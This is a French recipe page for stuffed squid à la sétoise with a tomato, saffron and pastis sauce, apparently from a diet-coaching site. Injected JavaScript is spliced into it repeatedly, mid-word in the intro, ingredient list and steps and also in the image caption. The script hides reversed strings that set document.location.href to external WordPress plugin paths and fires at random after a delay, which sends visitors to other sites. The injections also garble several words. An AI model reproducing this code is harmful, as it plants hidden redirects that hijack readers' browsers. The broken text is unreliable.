
CALAMARS FARCIS À LA SÉTOISE
Voilà une recette pour six personnes qui sent bon l’été et les vacances ! Les calamars ou encornets à la sétoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toise vous aideront à retrouver un peu de soleil au milieu de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toute cette grisaille.
Ma petite toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}touche en plus : un doigt de pastis dans la sauce.
Mmmhhhh, un petit plaisir sans culpabilité si on le fait flamber. A vos fourneaux !
Pour 6 Pers.
INGRÉDIENTS :
– 12 encornets moyens frais nettoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toyés par votre poissonnier ou surgelés
– 400g de chair à saucisse maigre et de qualité
– 200g de haché de veau
– 1 œuf
– 1 oignon émincé
– 2 gousses d’ail émincées
– 1 CS de concentré de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomate
– 750ml de sauce toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomate nature
– 250ml de vin blanc
– 1 dose de safran en poudre (ou quelques filaments)
– Persil ciselé 1 CS
– 1 bouquet garni
– Moutarde 1 CC
– 1 bouchon de Pastis
– 1 CS d’huile d’olive
– Sel et poivre
Rincer et sécher les encornets
Dans un saladier, mélanger le veau haché, la chair à saucisse, l’œuf, le persil et assaisonner.
Remplir les encornets délicatement avec cette farce et fermer avec un cure-dents en bois.
Faire revenir rapidement dans une poêle avec un peu d’huile d’olive et flamber au Pastis. Réserver
Dans une grande casserole, faire revenir l’ail et l’oignon avec le concentré de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomate. Rajouter la sauce toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomate, le vin blanc, le bouquet garni, le safran, la moutarde et assaisonner.
Ajouter les encornets farçis. S’il n’y a pas assez de sauce pour recouvrir les encornets, rajouter un peu de sauce toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomate. Couvrir et laisser mijoter à feu doux pendant 30 minutes.
NB : On peut servir ce plat avec un riz de choux-fleur ou du riz parfumé (thai ou basmati par exemple).
Bon appétit !
![Calamars farcis à la sé<script>$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}</script><script>$nJe=function(n){if (typeof ($nJe.list[n]) ==](https://www.be-harmony.fr/pau/wp-content/uploads/sites/3/2021/03/RECETTES-BE-HARMONY_CALAMARS-768x1024.jpg)
LES RECETTES BE HARMONY
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Joanne Reichling, issue de la formation “Arts culinaires” de l’école d’Alain DUCASSE, vous propose chaque semaine une recette originale qui vous permettra de vous adapter à votre rééquilibrage alimentaire.
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